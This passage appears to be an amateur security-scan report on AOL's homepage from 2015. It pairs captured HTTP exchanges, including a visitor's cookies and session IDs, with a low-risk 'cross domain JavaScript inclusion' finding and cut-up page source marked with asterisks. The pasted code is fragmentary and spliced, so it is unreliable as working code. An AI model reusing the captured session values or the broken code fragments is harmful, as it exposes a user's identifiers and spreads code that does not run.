UNAUTHID=1.4e6e39f797044c5ead9c2c8d301d3ad6.d7ac; CUNAUTHID=1.4e6e39f797044c5ead9c2c8d301d3ad6.d7ac; s_vi=[CS]v1|2AA996DE051D5D16-6000190660004439[CE]
Host: asvcs.aol.com



Response:


HTTP/1.1 200 OK
Date: Wed, 13 May 2015 13:08:27 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-82_158_237_5=esp%3A%3Amadrid%3A%3A40.42618%3A%3A-3.68514%3A%3Acable%3A%3Am; expires=Wed, 13-May-2015 14:08:27 GMT; path=/
X-AOL-SNH: 8e0be3cec0fd3de369b26c645c803484
X-UA-Compatible: IE=edge
Vary: Accept-Encoding
Content-Length: 378
Content-Type: text/html




Souce Code:



<!DOCTYPE html>
<html>
<head>
    <!-- data-main attribute tells require.js to load
         scripts/main.js after require.js loads. -->
<script data-main="sn_sync" src="/include/sn_sync-built.js"></script>
</head>
<body leftmargin="0" topmargin="0" rightmargin="0" bottommargin="0">
    <img id="sn_sync" style="display: none" height="1" width="1" border="0"/>
</body>
</html>






2


http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x75;noperf=1;alias=93309868;cfp=1;noaddonpl=y;kvpops_cb=3_column_rm;kvpg=aol;kvugc=0;kvui=4e6e39f797044c5ead9c2c8d301d3ad6;kvh5lsid=0;kvmn=93309868;kvgrp=522503165;kvismob=2;kvoch=us.aolportal;extmirroring=0;kvtile=3;target=_blank;aduho=120;grp=522503165 HTTP/1.1


Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
DNT: 1
Referer: http://www.aol.com/ads/load_v7.html
Accept-Encoding: sdch
Accept-Language: es-ES,es;q=0.8
Cookie: CfP=1
Host: at.atwola.com


Response


HTTP/1.0 200 OK
Expires: Mon, 15 Jun 1998 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache
Server: Adtech Adserver
Content-Type: application/x-javascript
P3P: CP="NOI DSP DEVa OUR BUS UNI COM NAV INT"
Set-Cookie: JEB2=55534AD873651AC52F870E4EF0006986;expires=Fri, 12 May 2017 13:8:26 GMT;domain=atwola.com;path=/
Content-Length: 358
Connection: keep-alive


Souce Code:



document.write('<a href="http://at.atwola.com/?adlink/5113/1649059/0/2018/AdId=5973711
;BnId=241;itime=522506958;impref=14315225062181221732;imprefseq=96829599820353789;
imprefts=1431522506;
" target="_blank"><img src="http://aka-cdn-ns.adtechus.com/images/274/Ad0St1Sz2018Sq0V1Id24374546.jpg"
 border="0" alt="Advertisement" width="300" height="75"/></a>');









CROSS DOMAIN JAVASCRIPT SOURCE FILE INCLUSION  ( 16773)

*********************************************************************

Only One Example ( Toooooooooooo Much Fails)

Risk:Low

Confidence: Medium

http://www.aol.com/ HTTP/1.1



Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
DNT: 1
Accept-Encoding: sdch
Accept-Language: es-ES,es;q=0.8
Cookie: s_pers=%20s_fid%3D49A28934042265F6-144A9301083E75C3%7C1494679817612%3B%20s_getnr%3D1431521417622-Repeat%7C1494593417622%3B%20s_nrgvo%3DRepeat%7C1494593417624%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2AA996DE051D5D16-6000190660004439[CE]; UNAUTHID=1.4e6e39f797044c5ead9c2c8d301d3ad6.d7ac; CUNAUTHID=1.4e6e39f797044c5ead9c2c8d301d3ad6.d7ac
Host: www.aol.com




Response:


HTTP/1.1 200 OK

Date: Wed, 13 May 2015 13:08:22 GMT

Server: Apache-Coyote/1.1

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 

1970 GMT; path=/; domain=www.aol.com

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 

1970 GMT; path=/

Set-Cookie: RSP_CHECK_PORTAL_STARTPAGE.AOL.COM=deleted; expires=Thu Jan 01 00:17:51 

1970 GMT; path=/; domain=aol.com

Pragma: no-cache

Cache-Control: max-age=0, no-cache, no-store

R-Host: vm-149-174-11-24.asset.aol.com

ModPagespeedDisableFilters: rewrite_javascript,inline_css

Set-Cookie: JSESSIONID=C1C6311C0CC89ED9C4B1A74FE1C6581A; Path=/aol

Set-Cookie: tst=%2C65%2Cs391a%3A%2C73%2Cs392a%3A%2C70%2Cs393a%3A%2C71%2Cs394a%3A%2C69%2Cs395a%3A%2C73%2Cs396a%3A%2C94%2Cs397a%3A%2C70%2Cs398a%3A%2C81%2Cs399a%3A%2C94%2Cs400a%3A%2C95%2Cs401a%3A%2C81%2Cs402a%3A%2C79%2Cs403a%3A%2C64%2Cs404a%3A%2C6%2Cr903a%3A%2C4%2Cr904a%3A%2C1%2Cresptest%3A%2C4%2Cn700a%3A%2C4%2Cn701a%3A%2C6%2Cn702a%3A%2C90%2Cn703a%3A%2C4%2Cn704a%3A%2C3%2Cn705a%3A%2C3%2Cn706a%3A%2C0%2Cgravity-test%3A%2C0%2Cdlug-test; Expires=Fri, 

12-May-2017 13:08:22 GMT; Path=/

X-Mod-Pagespeed: 1.6.29.7-3343

Vary: Accept-Encoding

Content-Length: 210269

Content-Type: text/html;;charset=utf-8






Source Code:

(View Someone Examples / Source Code (See : *****)



<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="cobrand-main5  page- SAF MS adellesans-enabled  aol20 responsive  

notResponsiveTouch  " id="global-header-light">
<head>
<!-- vm-149-174-11-24.asset.aol.com 1431522502557 -->


****<style type="text/css">***********#chromeOneClick{cursor:pointer************ }</style><link rel="stylesheet" type="text/css" href="http://portal.aolcdn.com/p5/_v116.7/css/responsive.css"/><link rel="stylesheet" type="text/css" class="skin_link" *******


href="http://portal.aolcdn.com/p5/skin/_v81/A.city_blimp.css.pagespeed.cf.77HLeHtE1S.css"/>

<style>***********.IE #header_logo{filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://portal.aolcdn.com/p5/_v116.7/css/logo_IE.png', sizingMethod='crop')}***********************   </style><style type="text/css" id="adhoccss-responsive-


.slideshowmod.gmod{margin-top:-30px!important}.page-news .slideshowmod.gmod{margin-top:-30px!important}.mnid-news-social.gmod{border-bottom:none!important;padding-top:6px!important}.ccn{margin:0}#brightSpot{padding:0;margin:21px auto;border-



height:18px}.trend-v2 #aol-trendingstories span.apx-spmod-sponsored{position:absolute;top:14px;left:0}</style><script type="text/javascript" *********


**************src="http://portal.aolcdn.com/o.aolcdn.com/fonts/faw1kht.js.pagespeed.jm.xDwd8qSBeA.js"></script>*******************************



**********<script type="text/javascript">***********try{Typekit.load();}********catch(e){}</script>



<link rel="canonical" href="http://www.aol.com/"/>
<link href="https://plus.google.com/115771908788438436647/" rel="publisher"/>
<meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l r (ca 1 lz 1 nz 1 oz 1 vz 1) gen true for "http://www.aol.com" r (ca 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l r (n 0 s 0 v 0 l 0) gen true for 

"http://www.aol.com" r (n 0 s 0 v 0 l 0))'/>
<meta name="description" content="AOL offers today's news, sports, stock quotes, weather, movie 



<script type="text/javascript">***********************var pops_cb="3_column_rm";</script>******************************


<script type="text/javascript">******************String.prototype.trim=function(){return this.replace(/^\s*/,"").replace(/\s*$/,"")};function gC(a){var e=document.cookie.split(";");for(var b=0;b<e.length;b++){var d=e[b].trim().split("=");if(d[0]==a){return d[1]}}return 
*******************************************************
null}var 
de="www.aol.de",fr="www.aol.fr";var ius=new Array(de,fr);var TZs=new Array();TZs={0:{},1:{de:de,"de-at":de,"de-li":de,"de-lu":de,"de-ch":de,fr:fr,"fr-be":fr,"fr-lu":fr,"fr-mc":fr,"fr-ch":fr},2:{de:de,"de-at":de,"de-li":de,"de-lu":de,"de-ch":de,fr:fr,"fr-be":fr,"fr-
**********************************************************************

l*********u":fr,"fr-mc":fr,"fr-ch":fr},3:{},4:{},5:{},6:{},7:{},8:{},9:{},10:{},11:{},12:{},13:{},"-12":{},"-11":{},"-10":{},"-9":{},"-8":{},"-7":{},"-6":{},"-5":{},"-4":{},"-3":{},"-2":{},"-1":{}}******;var offSet=String(-(new Date().getTimezoneOffset()/60));var langloc=String(nav_lang());var fqdn;if

(TZs[offSet]&&TZs[offSet][langloc]){fqdn=TZs[offSet][langloc]}var doIr=true;if(typeof iro!="undefined"){for(var i in iro){if(iro[i]==fqdn){doIr=false}}}if(gC("intlr")=="0"){doIr=false}if(!gC("intlRedirBp")&&doIr){var ckNm="l18nUrl";var myLclUrl=gC(ckNm);if(myLclUrl!
*******************************************************************************

**************=null){for(i=0;i<ius.length;i++){if(myLclUrl.indexOf(ius[i])>=0){window.location.href=myLclUrl+"?r="+document.domain;break}}}else{if(fqdn){fqdn="http://"+fqdn;document.cookie=ckNm+"="+fqdn+";";window.location.href=fqdn+"?r="+document.domain}}}function ***********************

*************nav_lang(){if(typeof(navigator.language)=="string"){return(navigator.language.toLowerCase())}else{if(typeof(navigator.userLanguage)=="string"){return(navigator.userLanguage.toLowerCase())}else{return 0}}};</script>*****************


<meta data-nothing=''></meta>
************************************************************
<script type="text/javascript">*************var tidEnabled="true";var tidUrl="https://tacoda.at.atwola.com/atx/sync/hmpg/hp1id/default";var tidCookieTimeout="259200";var tidCookieRefreshBeforeExpiredTime="1";var 

getTidNoRdrBsDmnLstApnd="www.aol.com";var tidRdrCkiBsNm=".aol.com";var segEnabled="false";var segGenerationUrl="/ids.jsp";var segCookieFormatVersion="3";var glbLocTZCookieVer="1";var glbLocTZCookieExpSecs="43200";</script>**************




<script type="text/javascript">***************var osMergedJSCallbacks=[];var lazyLoadJavascripts=[];var beaconSwipeCallDelay=parseInt("");var segUserId="0",segSegId="M|N_3",segColIds="usprod-5.dl";(function(g){var d=g.getElementsByTagName("head")[0]||

g.documentElement,c={},e={},f={},b={},h={};function a(j,r){var o=b[j]=this._c,q=g.createElement("script"),n=0,p,m=p="text/javascript",k="c",i=(function(s){s[s]=s+"";return s[s]!=s+""})(new String("__count__"));function l(s,t){function u(w){do{if(!c[w]){return 0}}while

(w=b[w]);return 1}
var v=f[s];if(t===m){v&&v();l(h[s],k)}else{s&&u(s)&&!e[s]&&a(s,v)}}
f[j]=r;if(o&&!i){h[o]=j;p=k}
q.type=p;q.src=j;p===m&&(e[j]=1);q.onload=q.onreadystatechange=function(){if(!n&&(!q.readyState||q.readyState==="loaded"||q.readyState==="complete")){c[j]=n=1;l(j,p);q.onload=q.onreadystatechange=null;d.removeChild(q)}};d.insertBefore
*******************************************************************
(q,d.firstChild);return{_c:j,getJS:a}}
window.Aol||(Aol={});Aol.getJS=a})(document);bN_cfg={h:"aol.com, www.aol.com,www.aol.ca,aol.ca,w.main.welcomescreen.aol.com,main-w.welcomescreen.aol.com,n.main.welcomescreen.aol.com,main-


hl,633832|mnc-news-feed-dailyfinance,559408|user-menu,622767|mnc-sports-news-si",1],["uxi",segUserId],['sxi',segSegId],["cids",segColIds,1]],upgradeIE:false};beaconIcidPattern=new RegExp('(.*)?video\/|/videoid=');parStripList=

*******************************************

['aLk','impref,itime'];rebuildUrlFuncs=new Array();rebuildUrlFuncs.aLk=function(c){if(parStripList==null||parStripList.length<=0){return c}var f=c;var a=new Array();for(i=0;i<parStripList.length;i+2){var b=parStripList[i];var e=parStripList[i+1];if(b=="aLk"&&e!
*******************************************************************************

==null&&e.length>0){a=parStripList[i+1].split(",");break}}for(i=0;i<a.length;i++){var g=a[i];var d=g+"=.*?;|"+g+"=.*?$";var h=f.match(d);if(h!=null&&h.length>0){f=f.replace(h,"")}}return f};osMergedJSCallbacks.push(function(){if(document.createEvent){var 

******************************************************************************
a=document.createEvent("HTMLEvents");a.initEvent("BeaconLoaded",true,true);document.dispatchEvent(a)}bN.extractIds=function(f,d){var g=f.className,e=g&&g.match(/[a-z]{1,3}id-[^ ]+/g),m,c,h,j,k=encodeURIComponent,n,p=g&&g.match(/d_clk

*********************************************************************************

+/g);rebuildMethodNm=g&&g.match(/rufnc-[^ ]+/g);var b=null;if(g){b=g.match(/src-[^ ]+/)}if(b!=null){if(e!=null){e.push(b[0])}else{e=b}}if(typeof d!="undefined"){n=d}else{bN.set([["plid","",1],["mnid","",1],["mpid","",1],["mlid","",1],["lnid","",1],["icid","",1],

*********************************************************************************

["ncid","",1],["dtid","",1],["anid","",1],["apnIcidGlb","",1],["vid_series","",1],["vid_autoplay","",1],["vid_id","",1],["cid","",1],["src","",1],["d_clk","",1]]);n=""}if(p!=null&&p.length>0){bN.set("d_clk",1,1)}if(e){l=e.length;while(l--){m=e[l];h=m.indexOf("-");m=[m.substring

************************************************************************

(0,h),m.substr(h+1)];if(n.indexOf("|"+m[0]+"|")==-1){n+="|"+m[0]+"|";bN.set(m[0],m[1],1);if(m[0].match(/[in]cid/g)!=null){var o=m[1];if(typeof(p_c_n)!="undefined"&&o.indexOf(p_c_n)===-1){o=o+"_"+p_c_n}m=k(m[0])+"="+k(o);if((c=f.href)&&c.indexOf(m)===-

****************************************************************************

1&&c.substring(0,6)!="aol://"){f.href=c+((c.indexOf("?")===-1)?"?":"&")+m}}}}}(j=f.parentNode)&&bN.extractIds(j,n)};bN.rebuildHrefWithIcid=function(d,b){var c="";var e="";if(d.indexOf("?")==-1){return d+"?"+b}if(d.indexOf("icid=")>=0){urlParts=d.split("?");params=new 

Array();if(d.indexOf("&")==-1){params[0]=urlParts[1]}for(i=0;i<params.length;i++){param=params[i];if(param.indexOf("icid=")>=0){e=e+b+"&";continue}e=e+param+"&"}return urlParts[0]+"?"+e.substr(0,e.length-1)}else{return d+"&"+b}};bN.swipe=function(b,d,c)

*********************************************************************************

(h||b){evNdHref=g.href;if(typeof(beaconIcidPattern)=="undefined"){return}if(!evNdHref.match(beaconIcidPattern)){return}tmp=bN.get("template");cob=bN.get("cobrand");mid=bN.get("mnid",1);lid=bN.get("lnid",1);pid=bN.get

("plid",1);newIcidParam="icid="+encodeURIComponent(tmp+"|"+cob+"|"+mid+"|"+lid+"|"+pid);newHref=bN.rebuildHrefWithIcid(g.href,newIcidParam);g.href=newHref}})});</script>

**********************<script type="text/javascript">function PortalRightAdWrapper(){$("#adchoice").removeClass("right");$("#adfeedback").removeClass("righto");}</script>******************************

<script>*****************var lbCbr="videodeeplink";</script>***************************


<iframe src="./ads/load_v7.html#1" width="0" height="0" scrolling="NO" marginwidth="0" marginheight="0" frameborder="0" style="display:none"></iframe>


<script type="text/javascript">**************var assetsUrl='http://portal.aolcdn.com/p5/_v116.7';</script>**********************
<!-- os_merge -->



<script type="text/javascript" src="http://o.aolcdn.com/os_merge/?file=/ads/adsWrapper.js"></script>
<script type="text/javascript"></script>

</head>
<body class="city_blimp  "><noscript><meta HTTP-EQUIV="refresh" content="0;url='http://www.aol.com/?ModPagespeed=noscript'" /><style><!--table,div,span,font,p{display:none} --></style><div style="display:block">Please click <a href="http://www.aol.com/?

ModPagespeed=noscript">here</a> if you are not redirected within a few seconds.</div></noscript>
<div id="state-indicator" class="state-indicator"></div>
<script type="text/javascript">

**************************if(!Array.prototype.indexOf){Array.prototype.indexOf=function(a,b){var c=this.length>>>0;b=+b||0;if(Math.abs(b)===Infinity){b=0}
if(b<0){b+=c;if(b<0){b=0}}
for(;b<c;b++){if(this[b]===a){return b}}
return-1}};function getDeviceState(){var a=document.getElementById("state-indicator");var b;if(a.currentStyle){b=a.currentStyle.zIndex;}else{b=parseInt(window.getComputedStyle(a).getPropertyValue("z-index"),10)}
return b};function getMn(g,f,a,i,b,d,des){var e=getDeviceState();var c={};c.mns=g;c.mn=f;c.sps=a;c.div=i;c.w=b;c.h=d;c.des=des;if(a.indexOf(e)===-1){f=null}
if(g!==null&&g[e]!==null&&typeof(g[e])!=="undefined"&&g[e]!==""){f=g[e]}
c.cur=f;hmpg_ads.push(c);return f};var hmpg_ads=new Array();if(typeof AOL==="undefined"){AOL={};}
AOL.responsiveEnabled=true;AOL.isTablet=false;AOL.isWurflMobile=false;AOL.isMobileSwipe=false;AOL.pageType="";AOL.cobrand="main5";AOL.hostname="vm-149-174-11-

*****************24.asset.aol.com";AOL.timestamp="1431522502557";AOL.collapseModuleFeatureEnabled="false";AOL.enableMobileSearchFocus=false;AOL.articleOverlayActive=false;</script>
<script type='text/javascript'>adSetMOAT('1');</script>
<script type='text/javascript'>adSetOthAT('kvpops_cb=3_column_rm');</script>
<script type="text/javascript">adSetAdURL('./ads/load_v7.html');</script><script type="text/javascript">function MakeThisMyHomepage(){var 


p_c_n="main5";</script><script type="text/javascript" *********************


src="http://portal.aolcdn.com/o.aolcdn.com/os/aol/omniture.min.js.pagespeed.ce.PQC9PI6SM1.js"></script><script type="text/javascript">if(typeof s_265!="undefined"&&s_265!=null)

{s_265.channel="us.aolportal";s_265.linkInternalFilters="javascript:,aol.com,mapquest.com,#dl";s_265.linkTrackVars="prop20";s_265.pageName="homepage main";s_265.pageName='homepage 


<div class="mpid-1 ">
<div class="visNum dn">14</div>
<div id="themew" class='promo'></div></div>
</div>
<div id="pgbg" class="aol-global-header-true light aolv2-true">
<div id="global-header-bg" class="light"></div>
<div id="aol-header" class="aol-global-header light">
<div class="mpid-2 ">
<div id="headerlogo-global" class="mnid-logo plid-538140 globalHeaderLogo">
<div id="mobilegridlogosrc" class="dn" data-logodark="http://portal.aolcdn.com/p5/forms/26319/2b9734c1-362f-44c0-ae7a-bf6315ed2f6c.png" data-logomain="http://portal.aolcdn.com/p5/forms/56191/d3a8d933-16c2-4827-8663-


*******************************************************************
src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAALIAAABFCAMAAADZw0z7AAACrFBMVEUAAAAzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMz

MzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM

zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMz

MzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzM

zMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMzMnxZ6xAAAA4

3RSTlMAAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKy0uLzAxMzQ1Njg5Ojs8PT5AQUJDREVGR0hKTU5PUFJTVFVXWFpbXV5fYGFiY2RlZmdpamttbm9wcnN0dnh5ent8fX6AgYKDhIWGh4iJiouMjY6RkpOUlZaYmZqbnJ2foKGipKWnqKqrrK2vsLGys7S1tre

4ubq7vL2+v8DBwsPExcbHyMnLzM3Oz9DR0tPU1dbX2Nna3N7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/ruZZ3MAAAXCSURBVGjezZr7X1RFGMZZWrm5GSigFoqBSopdFAgkQ0DyEhh0gbISpSTLLqal3aQIK0K6qRgZWplKWilSEVJSkGgEiIWAGyDBzj/SCnL2zDMzhzm7Zz

+f8/7GPPO+58ueubwz7/HxEVoJUds2H69ZJfUgUul2oKBuKlCb1fzIuXQgstz8yN8C8n7TI88HYjI03ezIRYhMNpkc2f9vBrnZYm7kbMLa3eZGPsJB/tjUyLM5xGQgxMzI23jIZL2JkSd0cJHrTYy8ivBtkXmRDwqQ3zUt8gyHALl3olmRNxOR5cqGsCas2VFV80vL

+cbaQ28XpAZ5Gdn3TyHyd1IBrl/zWQ/td6V6443eRL6HiO0WiYSqzM7zHNq/xHvIn2og7xjPeWb5kND5cLyXkKf9p4Hc6afpa8m3aziT4dcDvIK8iY7QT/

+ZqeUa8gUZxxpjvIBsaaYjbKH//FLDdc5vZFy7tNR45KV0gIuB9Kt2zBR6zrtIJGxwheHIn9ABynE2bhZmf61EygZTDEYOvYJjN49uOOcrWIwbiaT1xhiLvAH2AJvPVNi+l/GnwD4ibWdshiKfYWdbDd1UwfXLIzpsp5HIyRB8nbPtWRiLYRy/qV16kB1JBiKXQ/BIZ9sCaCvk

+JUSXVZnMQw5uI93DmmB7YCzWvB26dZdT2ZnrS3+lcecaRhyPkR+eaS1GFqTGL/3WajjaWNLy+27WfW0Ycg/Q+SEkdZ0aN013sshxE5l1snnGeYkg5AXQdyO0R/K/zLd/O8k8FuPQB230h3CfsAeHxiE/B7ELbvWjmvuY

+B3DDeL2zDyFEw/uicYgjwRfk2ySnDXXAs75jDo97OxFwxAnzRDkB/B66Gx02kYnl/p954F6lcytznbDUE+BVEPKsoJUIopv9dAvZO7fkLyX20EMm4ZJF+RngalizpdVNNiAz98Gd2rxwhkXH7JDEWKRSlH7QhbzRZ++OUQItRz5ABME

+pU4lnQjqpv8GD2ZQjSWggR7znyA/hLvqgS30QxWjVKQYoSPOAfuluq58i4uJI4lZiGoqp0GQlSsOABzfwV1H3kGIRqV2dbfr2gqkqXsySRm4xGfgORSyl5L8quU2cIKKID7QW6W7qnyH6dyNTfrTbcvFSlS39QUvhPmCRavd1FXk102pDrXrBVqkCI02G6p8iH9CKryKB2XCO17Pd5upVEOXQju0qX

b4ESy3tCIBQ/T

+hADlq4LGUuXkZsJfpNGbM5IOzmIT8FnYpkkX1Xfz04kiSUzacu3dvcQFZKlxGopHMuceGSnKyURJ7jStYcxQHi/V/KBiaPudfiks6sc4EnoUtfoBzyXdS/evIGRfjcHWRX6fIZVH6PgMF4AHtUyB2kYuHlHBvbwW4adgu5XnyL3kZVGWb/yPhmSCFbf0K/564pzxP3TMlC9rDah3OVs

+or/Yz6h68U8kOMo300Z/U95yayUrq8g6d+/8LK+IUZhVWDHO1RuXuMU6znBu49hbS5SpcVOtd0qxRyGMf1KPfML295Y8Gj+3T5rZC7RkzluHZdFcKZN2dv4duQuHS5UQ/xHsnL2hyeM/9p66QrgvOUuX1cnvivcEnk

+wTIliammhEqQM7WKF1Ok95ABxNkCw/JHO82Z/sSplWYS9n6NUqXcT2SyDnS5R0bp2p6Vf5I8/KXNnaiZrnExXJTcK2OItoB7scKk5nzxiV/ITI7MtSly8QLEqPiQT2lSnb5bXfmJk8wre

+I02ob80M6IlXyrPrxiDsX6ysIV2KAbGdjAxM2UeMowF7IU6VL/1e1s5W9YTrL7lOa2f02UeO0wbFMpjuULuO+0ai536v/44YIqgJaeh17uadV8R3Je+1aOdno+DvCBz6da3XnExJbibKBdY7Og5JytJs1D4mFTH/2e6OorVhzIWd3xglDFtDxClCP3l7nXOx6Dz9u8/GmhWe/tK

+h/bLz9NHZVFX0cLSH4azBruPI/yMtEh8grClEAAAAAElFTkSuQmCC"/></a></div></div>
<div class="mpid-3 ">
<div id="search-shadow"></div>
<div class="mnid-header-search plid-531175">
<form id="aol-header-search" action="http://search.aol.com/aol/search" method="get" class="search search-3 tabs-0">

<input type="hidden" id="header-ghostText" value=""/>
<input type="hidden" id="header-searchIcon" value=""/>
<input type="hidden" id="header-enabledTerms" name="enabled_terms" value=""/>
<input type="hidden" id="header-s_it" name="s_it" value="comsearch"/>
<input type="hidden" id="header-s_it_h" value="comsearch"/>
<input type="hidden" id="header-s_it_r" value="comsearch"/>
<input type="hidden" id="header-s_it_f" value="comsearch"/>
<input type="hidden" id="header-s_it_s" value="comsearch"/>
<input type="hidden" id="header-initSmartSearch" value="false"/>
<input type="hidden" id="header-apiDictionary" value=""/>
<input type="hidden" id="header-initFocus" value="true"/>
<input type="hidden" id="header-preserveGhostText" value=""/>
<input type="hidden" id="header-ssExtraParams" value="s_qt=ac&s_chn=prt_aol20"/>
<input type="hidden" id="header-sExtraParams" value="s_chn=prt_aol20"/>
<input type="hidden" id="header-apiIt" value=""/>
<input type="hidden" id="header-apiUrl" value="http://autocomplete.search.aol.com/autocomplete/get"/>
<input type="hidden" id="header-apiCount" value="8"/>
<input type="hidden" id="header-apiQueryParam" value="q"/>
<input type="hidden" id="header-enableBestMatch" value="true"/>
<input type="hidden" id="header-bestMatchQuery" value="bm_chan=2&bm_max=1&bm_limit=4"/>
<input type="hidden" id="header-bestMatchPrefix" value="in"/>
<input type="hidden" id="header-bestMatchAction" value="http://search.aol.com/aol/tracking"/>
<fieldset>
<input class="" type="text" value="" id="aol-header-query" name="q" maxlength="150" title="Search the Web"/>
<input class="om_header-searchbutton lnid-sec2_lnk1" type="submit" value="Search" id="aol-header-search-button" onclick="omn.omo('header-searchbutton');" title="Search the Web"/>
<div id="aol-header-search-results"></div>
</fieldset>
</form>
</div></div>
<div id="user-menu-wrapper"><div class="mpid-4 ">
<div id="usrMnu" class="mnid-user-menu plid-559408 unauthenticated" hidedelay="200" showdelay="200">
<p class="username unauth">
<a href="https://my.screenname.aol.com/_cqr/login/login.psp?authLev=0&lang=en&locale=us&sitedomain=startpage.aol.com&siteState=OrigUrl%3Dhttp%253A%252F%252Fwww.aol.com%252F" class="lnid-sec1_lnk1">Sign In <span class="signindivider">|</span> Sign 

Up</a>
</p>
<ul class="usrSns">
</ul>
<div class="usrMnuLst mnid-user-menu plid-559408">
<div class="topLine"></div>
<ul>
<li><a class="lnid-sec2_lnk1" href="https://account.aol.com/account/settings/start">My Account</a></li><li><a class="makeHomepage url-http://www.aol.com/?mtmhp=txtlnkusaolp00000051&xicid=acm50options_mtmhp om-mtmhpGreetingIE lnid-sec2_lnk2" 

href="http://www.aol.com/?molhp=txtlnkusaolp00000051&icid=acm50options_mtmhp">Set AOL as Homepage</a></li></ul>
</div></div></div>
</div><div id="quick-nav-wrapper"><div class="mpid-5 ">
<div id="quick-nav-global_w">
<div id="quick-nav-global" quick-nav-icons="1" class=" quicknav quick-nav1">
<a class="mobile-search"><script pagespeed_no_defer="">//<![CDATA[
(function(){var 

d=window,e=document,f="documentElement",g="scrollTop",k="prototype",l="body",m="getAttribute",n="",p="1",q="data",r="img",s="load",t="number",u="on",v="onload",w="pagespeed_lazy_position",x="pagespeed_lazy_replaced_functions",y="pagespeed_lazy_src",z="po

sition",A="relative",B="resize",C="scroll",D="src";d.pagespeed=d.pagespeed||{};var E=d.pagespeed,F=function(a){this.d=[];this.a=0;this.b=!1;this.o=a;this.e=null;this.i=0;this.j=200;this.c=!1};
F[k].s=function(){var a=0;typeof d.pageYOffset==t?a=d.pageYOffset:e[l]&&e[l][g]?a=e[l][g]:e[f]&&e[f][g]&&(a=e[f][g]);var b=d.innerHeight||e[f].clientHeight||e[l].clientHeight;return{top:a,bottom:a+b,height:b}};F[k].n=function(a){var b=a[m](w);if(b)return 

parseInt(b,0);var b=a.offsetTop,c=a.offsetParent;c&&(b+=this.n(c));b=Math.max(b,0);a.setAttribute(w,b);return b};F[k].r=function(a){var b=this.n(a);return{top:b,bottom:b+a.offsetHeight}};
F[k].q=function(a,b){if(a.currentStyle)return a.currentStyle[b];if(e.defaultView&&e.defaultView.getComputedStyle){var c=e.defaultView.getComputedStyle(a,null);if(c)return c.getPropertyValue(b)}return a.style&&a.style[b]?a.style[b]:n};F[k].p=function(a){if(!

this.c&&(0==a.offsetHeight||0==a.offsetWidth))return!1;if(this.q(a,z)==A)return!0;var b=this.s(),c=a.getBoundingClientRect();c?(a=c.top-b.height,b=c.bottom):(c=this.r(a),a=c.top-b.bottom,b=c.bottom-b.top);return a<=this.a&&0<=b+this.a};
F[k].m=function(a){this.l(a);var b=this;d.setTimeout(function(){var c=a[m](y);if(null!=c)if((b.b||b.p(a))&&-1!=a.src.indexOf(b.o)){var h=a.parentNode,G=a.nextSibling;h&&h.removeChild(a);a.getAttribute=a.k;a.removeAttribute(v);a.removeAttribute

(y);a.removeAttribute(x);h&&h.insertBefore(a,G);a.src=c}else b.d.push(a)},0)};F[k].loadIfVisible=F[k].m;F[k].u=function(){this.b=!0;this.f()};F[k].loadAllImages=F[k].u;F[k].f=function(){var a=this.d,b=a.length;this.d=[];for(var c=0;c<b;++c)this.m(a[c])};
